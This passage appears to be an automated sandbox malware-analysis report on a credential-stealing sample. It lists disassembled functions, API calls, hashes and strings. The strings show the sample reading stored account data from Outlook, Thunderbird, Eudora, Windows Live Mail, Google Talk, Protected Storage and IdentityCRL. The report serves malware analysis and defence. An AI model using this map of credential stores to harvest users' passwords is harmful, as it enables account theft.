                  • memcpy.MSVCRT ref: 0040840A
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$ByteCharMultiNameWidestrlen$ComputerUsermemcpy
                  • String ID: 5$H$O$b$i$}$}
                  • API String ID: 1832431107-3760989150
                  • Opcode ID: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                  • Instruction ID: 30108760c83c1dc53a9521f9e33a2a4701cfdd5ab922e7e2e5f0797d9ff7fddf
                  • Opcode Fuzzy Hash: dbc5b2c41103eb4c577891d3a58301c7b9bd9d40af4516c3687f3402f5e388bf
                  • Instruction Fuzzy Hash: BC51F67180029DAEDB11CFA4CC81BEEBBBCEF49314F0441AAE555E7182D7389B45CB65
                  Function 00407EF8 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58filestringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 432 407ef8-407f01 433 407f03-407f22 FindFirstFileA 432->433 434 407f24-407f38 FindNextFileA 432->434 435 407f3f-407f44 433->435 436 407f46-407f74 strlen * 2 434->436 437 407f3a call 407f90 434->437 435->436 439 407f89-407f8f 435->439 440 407f83 436->440 441 407f76-407f81 call 4070e3 436->441 437->435 443 407f86-407f88 440->443 441->443 443->439
                  APIs
                  • FindFirstFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F0E
                  • FindNextFileA.KERNELBASE(?,?,?,?,00444270,*.oeaccount,ACD,?,00000104), ref: 00407F2C
                  • strlen.MSVCRT ref: 00407F5C
                  • strlen.MSVCRT ref: 00407F64
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: FileFindstrlen$FirstNext
                  • String ID: ACD
                  • API String ID: 379999529-620537770
                  • Opcode ID: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                  • Instruction ID: 71029bc486f6697817f6bb289966da7394398bd7116df025ae0cbd4ece6cffc9
                  • Opcode Fuzzy Hash: 27d5437505665631421f449a56434de01e8b3a886fb5cb3a927ed9b27628f516
                  • Instruction Fuzzy Hash: 581170769092029FD354DB34D884ADBB3D8DB45725F100A2FF459D21D1EB38B9408B5A
                  Function 00401E69 Relevance: 52.8, APIs: 19, Strings: 11, Instructions: 261stringregistryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • memset.MSVCRT ref: 00401E8B
                  • strlen.MSVCRT ref: 00401EA4
                  • strlen.MSVCRT ref: 00401EB2
                  • strlen.MSVCRT ref: 00401EF8
                  • strlen.MSVCRT ref: 00401F06
                  • memset.MSVCRT ref: 00401FB1
                  • atoi.MSVCRT ref: 00401FE0
                  • memset.MSVCRT ref: 00402003
                  • sprintf.MSVCRT ref: 00402030
                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                  • memset.MSVCRT ref: 00402086
                  • memset.MSVCRT ref: 0040209B
                  • strlen.MSVCRT ref: 004020A1
                  • strlen.MSVCRT ref: 004020AF
                  • strlen.MSVCRT ref: 004020E2
                  • strlen.MSVCRT ref: 004020F0
                  • memset.MSVCRT ref: 00402018
                    • Part of subcall function 004070E3: _mbscpy.MSVCRT ref: 004070EB
                    • Part of subcall function 004070E3: _mbscat.MSVCRT ref: 004070FA
                  • _mbscpy.MSVCRT ref: 00402177
                  • RegCloseKey.ADVAPI32(00000000), ref: 00402181
                  • ExpandEnvironmentStringsA.KERNEL32(%programfiles%\Mozilla Thunderbird,?,00000104), ref: 0040219C
                    • Part of subcall function 00406F81: GetFileAttributesA.KERNELBASE(?,00401EE6,?), ref: 00406F85
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: strlen$memset$Close_mbscpy$AttributesEnvironmentExpandFileStrings_mbscatatoisprintf
                  • String ID: %programfiles%\Mozilla Thunderbird$%s\Main$Install Directory$Mozilla\Profiles$Software\Classes\Software\Qualcomm\Eudora\CommandLine\current$Software\Mozilla\Mozilla Thunderbird$Software\Qualcomm\Eudora\CommandLine$Thunderbird\Profiles$current$nss3.dll$sqlite3.dll
                  • API String ID: 1846531875-4223776976
                  • Opcode ID: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                  • Instruction ID: 9c65708a615aa9161e76439fb3ec4404e3c7586a7422c94cf2faf2b42662f59f
                  • Opcode Fuzzy Hash: 24cd1edf3e0e6a0f2a794eae778d20d0b8fcf68951756f89e235529ef22c09db
                  • Instruction Fuzzy Hash: 2291193290515D6AEB21D6618C86FDE77AC9F58304F1400FBF508F2182EB78EB858B6D
                  Function 0040CF44 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 169COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 00404A99: LoadLibraryA.KERNEL32(comctl32.dll), ref: 00404AB8
                    • Part of subcall function 00404A99: GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00404ACA
                    • Part of subcall function 00404A99: FreeLibrary.KERNEL32(00000000), ref: 00404ADE
                    • Part of subcall function 00404A99: MessageBoxA.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404B09
                  • ??3@YAXPAX@Z.MSVCRT ref: 0040D190
                  • DeleteObject.GDI32(?), ref: 0040D1A6
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: Library$??3@AddressDeleteFreeLoadMessageObjectProc
                  • String ID: $/deleteregkey$/savelangfile$Error$Failed to load the executable file !
                  • API String ID: 745651260-375988210
                  • Opcode ID: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                  • Instruction ID: dea5423bbc6b84474d5379bd8edfb36e55d4f41410ab6b686afcfd17116e90de
                  • Opcode Fuzzy Hash: bd8dfaf8f5238b4af1542c29128bf357c1e928978a50a5a806f3f0ecb947c582
                  • Instruction Fuzzy Hash: 0A61AF71908345EBD7609FA1EC89A9FB7E8FF85704F00093FF544A21A1DB789805CB5A
                  Function 00403C16 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 184libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 004107F1: FreeLibrary.KERNELBASE(?,00403C30), ref: 004107FD
                  • LoadLibraryA.KERNELBASE(pstorec.dll), ref: 00403C35
                  • GetProcAddress.KERNEL32(00000000,PStoreCreateInstance), ref: 00403C4A
                  • _mbscpy.MSVCRT ref: 00403E54
                  Strings
                  • Software\Microsoft\Windows Messaging Subsystem\Profiles, xrefs: 00403D3B
                  • www.google.com/Please log in to your Gmail account, xrefs: 00403C86
                  • www.google.com/Please log in to your Google Account, xrefs: 00403C9A
                  • Software\Microsoft\Office\15.0\Outlook\Profiles, xrefs: 00403D6E
                  • Software\Microsoft\Internet Account Manager\Accounts, xrefs: 00403CD6
                  • Software\Microsoft\Office\16.0\Outlook\Profiles, xrefs: 00403DA4
                  • Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles, xrefs: 00403D42
                  • Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts, xrefs: 00403CFB
                  • www.google.com:443/Please log in to your Gmail account, xrefs: 00403C90
                  • PStoreCreateInstance, xrefs: 00403C44
                  • www.google.com:443/Please log in to your Google Account, xrefs: 00403CA4
                  • pstorec.dll, xrefs: 00403C30
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: Library$AddressFreeLoadProc_mbscpy
                  • String ID: PStoreCreateInstance$Software\Microsoft\Internet Account Manager\Accounts$Software\Microsoft\Office\15.0\Outlook\Profiles$Software\Microsoft\Office\16.0\Outlook\Profiles$Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts$Software\Microsoft\Windows Messaging Subsystem\Profiles$Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles$pstorec.dll$www.google.com/Please log in to your Gmail account$www.google.com/Please log in to your Google Account$www.google.com:443/Please log in to your Gmail account$www.google.com:443/Please log in to your Google Account
                  • API String ID: 1197458902-317895162
                  • Opcode ID: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                  • Instruction ID: f12475a9e901df39a06d2b9041e3ab5decda6d4897279b708da5bb949cd86342
                  • Opcode Fuzzy Hash: d1d1a1f093fb0983e81b65a453c5b2aa4e35261ad02c39a564d79f1cb6208b2a
                  • Instruction Fuzzy Hash: 7C51C971600201B6E714EF71CD86FDAB66CAF01709F14013FF915B61C2DBBDA658C699
                  Function 00444C4A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 128COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 231 444c4a-444c66 call 444e38 GetModuleHandleA 234 444c87-444c8a 231->234 235 444c68-444c73 231->235 237 444cb3-444d00 __set_app_type __p__fmode __p__commode call 444e34 234->237 235->234 236 444c75-444c7e 235->236 238 444c80-444c85 236->238 239 444c9f-444ca3 236->239 246 444d02-444d0d __setusermatherr 237->246 247 444d0e-444d68 call 444e22 _initterm __getmainargs _initterm 237->247 238->234 241 444c8c-444c93 238->241 239->234 242 444ca5-444ca7 239->242 241->234 244 444c95-444c9d 241->244 245 444cad-444cb0 242->245 244->245 245->237 246->247 250 444da4-444da7 247->250 251 444d6a-444d72 247->251 254 444d81-444d85 250->254 255 444da9-444dad 250->255 252 444d74-444d76 251->252 253 444d78-444d7b 251->253 252->251 252->253 253->254 256 444d7d-444d7e 253->256 257 444d87-444d89 254->257 258 444d8b-444d9c GetStartupInfoA 254->258 255->250 256->254 257->256 257->258 259 444d9e-444da2 258->259 260 444daf-444db1 258->260 261 444db2-444dc6 GetModuleHandleA call 40cf44 259->261 260->261 264 444dcf-444e0f _cexit call 444e71 261->264 265 444dc8-444dc9 exit 261->265 265->264
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: HandleModule_initterm$InfoStartup__getmainargs__p__commode__p__fmode__set_app_type__setusermatherr_cexitexit
                  • String ID: k:v
                  • API String ID: 3662548030-4078055367
                  • Opcode ID: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                  • Instruction ID: dd0826a03bb44e9375613df7343647c7563f031d366e42a412bc6d4d3743f318
                  • Opcode Fuzzy Hash: 9c755aa49fdaa1e5b2c5d218946d9d177827adcc7bb206d52ece5a70cef5ea37
                  • Instruction Fuzzy Hash: AF41A0B0C02344DFEB619FA4D8847AD7BB8FB49325F28413BE451A7291D7388982CB5D
                  Function 0040FB00 Relevance: 21.1, APIs: 8, Strings: 4, Instructions: 101registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 269 40fb00-40fb35 call 44b090 RegOpenKeyExA 272 40fc37-40fc3d 269->272 273 40fb3b-40fb4f RegOpenKeyExA 269->273 274 40fb55-40fb7e RegQueryValueExA 273->274 275 40fc2d-40fc31 RegCloseKey 273->275 276 40fc23-40fc27 RegCloseKey 274->276 277 40fb84-40fb93 call 404734 274->277 275->272 276->275 277->276 280 40fb99-40fbd1 call 4047a5 277->280 280->276 283 40fbd3-40fbdb 280->283 284 40fc19-40fc1d LocalFree 283->284 285 40fbdd-40fc14 memcpy * 2 call 40f802 283->285 284->276 285->284
                  APIs
                  • RegOpenKeyExA.KERNELBASE(80000001,Software\Microsoft\IdentityCRL,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB31
                  • RegOpenKeyExA.KERNELBASE(?,Dynamic Salt,00000000,00020019,?,?,?,?,?,00403E7F,?), ref: 0040FB4B
                  • RegQueryValueExA.ADVAPI32(?,Value,00000000,?,?,?,?,?,?,?,00403E7F,?), ref: 0040FB76
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00403E7F,?), ref: 0040FC27
                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                  • memcpy.MSVCRT ref: 0040FBE4
                  • memcpy.MSVCRT ref: 0040FBF9
                    • Part of subcall function 0040F802: RegOpenKeyExA.ADVAPI32(0040FC19,Creds,00000000,00020019,0040FC19,00456E58,00000040,?,?,0040FC19,?,?,?,?), ref: 0040F82C
                    • Part of subcall function 0040F802: memset.MSVCRT ref: 0040F84A
                    • Part of subcall function 0040F802: RegEnumKeyA.ADVAPI32(?,00000000,?,000000FF), ref: 0040F94E
                    • Part of subcall function 0040F802: RegCloseKey.ADVAPI32(?), ref: 0040F95F
                  • LocalFree.KERNEL32(?,?,00001000,?,?,?,?,?,00403E7F,?), ref: 0040FC1D
                  • RegCloseKey.KERNELBASE(?,?,?,?,?,00403E7F,?), ref: 0040FC31
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: CloseOpen$memcpy$AddressEnumFreeLibraryLoadLocalProcQueryValuememset
                  • String ID: Dynamic Salt$Software\Microsoft\IdentityCRL$Value$XnE
                  • API String ID: 2768085393-2409096184
                  • Opcode ID: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                  • Instruction ID: dc42a4d3869b5799c80e2b369f36587618a74ee4c7744a3ab9dbe2425e101413
                  • Opcode Fuzzy Hash: 450d76980a5b045f2fe885eff3fb720ced70e3f8b230ed55941267a192e7c898
                  • Instruction Fuzzy Hash: BA316F72508348AFE750DF51DC81E5BBBECFB88358F04093EBA94E2151D735D9188B6A
                  Function 004442EA Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 97stringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • memset.MSVCRT ref: 0044430B
                    • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075A0
                    • Part of subcall function 0040759E: strlen.MSVCRT ref: 004075AB
                    • Part of subcall function 0040759E: _mbscat.MSVCRT ref: 004075C2
                    • Part of subcall function 00410DBB: memset.MSVCRT ref: 00410E10
                    • Part of subcall function 00410DBB: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000104), ref: 00410E79
                    • Part of subcall function 00410DBB: _mbscpy.MSVCRT ref: 00410E87
                  • memset.MSVCRT ref: 00444379
                  • memset.MSVCRT ref: 00444394
                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                  • ExpandEnvironmentStringsA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000000,00000104,00000104,?,?,?,?), ref: 004443CD
                  • strlen.MSVCRT ref: 004443DB
                  • _strcmpi.MSVCRT ref: 00444401
                  Strings
                  • \Microsoft\Windows Mail, xrefs: 00444329
                  • \Microsoft\Windows Live Mail, xrefs: 00444350
                  • Software\Microsoft\Windows Live Mail, xrefs: 004443AA
                  • Store Root, xrefs: 004443A5
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$strlen$Close$EnvironmentExpandStrings_mbscat_mbscpy_strcmpi
                  • String ID: Software\Microsoft\Windows Live Mail$Store Root$\Microsoft\Windows Live Mail$\Microsoft\Windows Mail
                  • API String ID: 832325562-2578778931
                  • Opcode ID: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                  • Instruction ID: c969096c6c8075cae9da81fbffcb27ba025b1fc1210c9b39c3855a2ab2b3ab2e
                  • Opcode Fuzzy Hash: 88eecb5596c8840dacdab9e6d9cddf85e53b3344e0b54babe6c18053d28390f2
                  • Instruction Fuzzy Hash: A73197725083446BE320EA99DC47FCBB7DC9B85315F14441FF64897182D678E548877A
                  Function 0040F460 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 308 40f460-40f5bd memset * 2 call 4078ba * 2 RegOpenKeyExA 313 40f5c3-40f5ea RegQueryValueExA 308->313 314 40f6d9-40f6df 308->314 315 40f6d0-40f6d3 RegCloseKey 313->315 316 40f5f0-40f5f4 313->316 315->314 316->315 317 40f5fa-40f604 316->317 318 40f606-40f618 call 40466b call 404734 317->318 319 40f677 317->319 329 40f66a-40f675 call 404785 318->329 330 40f61a-40f63e call 4047a5 318->330 321 40f67a-40f67d 319->321 321->315 322 40f67f-40f6bf call 4012ee RegQueryValueExA 321->322 322->315 328 40f6c1-40f6cf 322->328 328->315 329->321 330->329 335 40f640-40f643 330->335 336 40f661-40f664 LocalFree 335->336 337 40f645-40f65a memcpy 335->337 336->329 337->336
                  APIs
                  • memset.MSVCRT ref: 0040F567
                  • memset.MSVCRT ref: 0040F57F
                    • Part of subcall function 004078BA: _mbsnbcat.MSVCRT ref: 004078DA
                  • RegOpenKeyExA.KERNELBASE(80000001,00000082,00000000,00020019,?,?,?,?,?,00000000), ref: 0040F5B5
                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000082,?,?,?,?,00000000), ref: 0040F5E2
                  • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,000000BE,000000BE,?,?,?,?,00000000), ref: 0040F6B7
                    • Part of subcall function 0040466B: _mbscpy.MSVCRT ref: 004046BA
                    • Part of subcall function 00404734: LoadLibraryA.KERNELBASE(?,0040F715,?,00000000), ref: 0040473C
                    • Part of subcall function 00404734: GetProcAddress.KERNEL32(00000000,?), ref: 00404754
                  • memcpy.MSVCRT ref: 0040F652
                  • LocalFree.KERNEL32(?,?,00000000,?,?,?,?,?,00000000), ref: 0040F664
                  • RegCloseKey.ADVAPI32(?,?,?,?,?,00000000), ref: 0040F6D3
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: QueryValuememset$AddressCloseFreeLibraryLoadLocalOpenProc_mbscpy_mbsnbcatmemcpy
                  • String ID:
                  • API String ID: 2012582556-3916222277
                  • Opcode ID: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                  • Instruction ID: 8a535e2a1d92942c08e22e27bc62a3a9d9c5418ddd7b2e408e782496f1cf9495
                  • Opcode Fuzzy Hash: 2cdd3cefc8e37eb3b1e9bdc7d6d5fe14681a0691d37703b2182bb496bc4646ff
                  • Instruction Fuzzy Hash: 9E81FC218047CEDEDB31DBBC8C485DDBF745B17224F0843A9E5B47A2E2D3245646C7AA
                  Function 004037CA Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 338 4037ca-40381c memset * 2 call 444551 341 4038e2-4038e5 338->341 342 403822-403882 call 4021b6 call 406f06 * 2 strchr 338->342 349 403884-403895 _mbscpy 342->349 350 403897-4038a2 strlen 342->350 351 4038bf-4038dd _mbscpy call 4023e5 349->351 350->351 352 4038a4-4038bc sprintf 350->352 351->341 352->351
                  APIs
                  • memset.MSVCRT ref: 004037EB
                  • memset.MSVCRT ref: 004037FF
                    • Part of subcall function 00444551: memset.MSVCRT ref: 00444573
                    • Part of subcall function 00444551: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 004445DF
                    • Part of subcall function 00406F06: strlen.MSVCRT ref: 00406F0B
                    • Part of subcall function 00406F06: memcpy.MSVCRT ref: 00406F20
                  • strchr.MSVCRT ref: 0040386E
                  • _mbscpy.MSVCRT ref: 0040388B
                  • strlen.MSVCRT ref: 00403897
                  • sprintf.MSVCRT ref: 004038B7
                  • _mbscpy.MSVCRT ref: 004038CD
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$_mbscpystrlen$Closememcpysprintfstrchr
                  • String ID: %s@yahoo.com
                  • API String ID: 317221925-3288273942
                  • Opcode ID: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                  • Instruction ID: 76d3f49adc6711096ede71316d8c54080aa8a6e72e6628a7d10ff16d2d587f45
                  • Opcode Fuzzy Hash: 94ee0ce22b792c256a50841e845a97cde8158fcf202da7b3a2aba60cc9f07639
                  • Instruction Fuzzy Hash: 4B2154B3D001285EEB11EA54DD42FDA77ACDF85308F0404EBB649F7041E678AF888A59
                  Function 004034E4 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 47COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 354 4034e4-403544 memset * 2 call 410b1e 357 403580-403582 354->357 358 403546-40357f _mbscpy call 406d55 _mbscat call 4033f0 354->358 358->357
                  APIs
                  • memset.MSVCRT ref: 00403504
                  • memset.MSVCRT ref: 0040351A
                    • Part of subcall function 00410B1E: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 00410B57
                  • _mbscpy.MSVCRT ref: 00403555
                    • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                    • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                  • _mbscat.MSVCRT ref: 0040356D
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: _mbscatmemset$Close_mbscpystrlen
                  • String ID: InstallPath$Software\Group Mail$fb.dat
                  • API String ID: 3071782539-966475738
                  • Opcode ID: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                  • Instruction ID: a2fd564f6d67a76fe1541fb13c78ccc0c8ee6374decffd3371ae058987aad369
                  • Opcode Fuzzy Hash: ba1e5b879fdebbe75c382cc963f8f285cb869b8741e9311d789e5899e64a9370
                  • Instruction Fuzzy Hash: C201FC7694416875E750F6659C47FCAB66CCB64705F0400A7BA48F30C2DAF8BBC486A9
                  Function 0040CCD7 Relevance: 9.1, APIs: 6, Instructions: 71windowCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 363 40ccd7-40cd06 ??2@YAPAXI@Z 364 40cd08-40cd0d 363->364 365 40cd0f 363->365 366 40cd11-40cd24 ??2@YAPAXI@Z 364->366 365->366 367 40cd26-40cd2d call 404025 366->367 368 40cd2f 366->368 369 40cd31-40cd57 367->369 368->369 371 40cd66-40cdd9 call 407088 call 4019b5 memset LoadIconA call 4019b5 _mbscpy 369->371 372 40cd59-40cd60 DeleteObject 369->372 372->371
                  APIs
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: ??2@$DeleteIconLoadObject_mbscpymemset
                  • String ID:
                  • API String ID: 2054149589-0
                  • Opcode ID: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                  • Instruction ID: e49e2262ea613e2b532621416bf92f05b9d60d1a181aada648b692035ce2a44d
                  • Opcode Fuzzy Hash: ac2346bdc6bf8c69db932d73876581c2cd712649df4ebdee0f030b2719307f74
                  • Instruction Fuzzy Hash: C921A1B0900360DBDB10DF749DC97897BA8EB40B04F1405BBED08FF286D7B895408BA8
                  Function 004085D2 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79registryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 004082CD: memset.MSVCRT ref: 0040832F
                    • Part of subcall function 004082CD: memset.MSVCRT ref: 00408343
                    • Part of subcall function 004082CD: memset.MSVCRT ref: 0040835F
                    • Part of subcall function 004082CD: memset.MSVCRT ref: 00408376
                    • Part of subcall function 004082CD: GetComputerNameA.KERNEL32(?,?), ref: 00408398
                    • Part of subcall function 004082CD: GetUserNameA.ADVAPI32(?,?), ref: 004083AC
                    • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083CB
                    • Part of subcall function 004082CD: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,000000FF), ref: 004083E0
                    • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083E9
                    • Part of subcall function 004082CD: strlen.MSVCRT ref: 004083F8
                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNELBASE(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                  • memset.MSVCRT ref: 00408620
                    • Part of subcall function 00410B62: RegEnumKeyExA.ADVAPI32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                  • memset.MSVCRT ref: 00408671
                  • RegCloseKey.ADVAPI32(?,?,?), ref: 004086AF
                  • RegCloseKey.ADVAPI32(?), ref: 004086D6
                  Strings
                  • Software\Google\Google Talk\Accounts, xrefs: 004085F1
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: memset$ByteCharCloseMultiNameWidestrlen$ComputerEnumOpenUser
                  • String ID: Software\Google\Google Talk\Accounts
                  • API String ID: 1366857005-1079885057
                  • Opcode ID: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                  • Instruction ID: c9a55fd20ea1a9e1148d2ba128c2c272dfe10edd9ec9a97c612e1cc238572be2
                  • Opcode Fuzzy Hash: b24b9a54dcd0214932f6ac2563ed0d1b1cb372bdd45dc4bf833f1fe5ea734f55
                  • Instruction Fuzzy Hash: 6E2181B140830AAEE610EF51DD42EAFB7DCEF94344F00083EB984D1192E675D95D9BAB
                  Function 0040BA28 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 72COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 403 40ba28-40ba3a 404 40ba87-40ba9b call 406c62 403->404 405 40ba3c-40ba52 call 407e20 _mbsicmp 403->405 427 40ba9d call 4107f1 404->427 428 40ba9d call 404734 404->428 429 40ba9d call 404785 404->429 430 40ba9d call 403c16 404->430 431 40ba9d call 410a9c 404->431 410 40ba54-40ba6d call 407e20 405->410 411 40ba7b-40ba85 405->411 417 40ba74 410->417 418 40ba6f-40ba72 410->418 411->404 411->405 412 40baa0-40bab3 call 407e30 419 40bab5-40bac1 412->419 420 40bafa-40bb09 SetCursor 412->420 421 40ba75-40ba76 call 40b5e5 417->421 418->421 422 40bac3-40bace 419->422 423 40bad8-40baf7 qsort 419->423 421->411 422->423 423->420 427->412 428->412 429->412 430->412 431->412
                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000D.00000002.2508813619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_13_2_400000_wab.jbxd
                  Similarity
                  • API ID: Cursor_mbsicmpqsort
                  • String ID: /nosort$/sort
                  • API String ID: 882979914-1578091866
                  • Opcode ID: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
                  • Instruction ID: 8a1fc52e493d51bfa0df36ad286e8752cb28bf69c391dd95ac0f49afa8242728
                  • Opcode Fuzzy Hash: eeec834885b89caefbd260ac574d55a400450caca1ca348474599114d02fe8b5
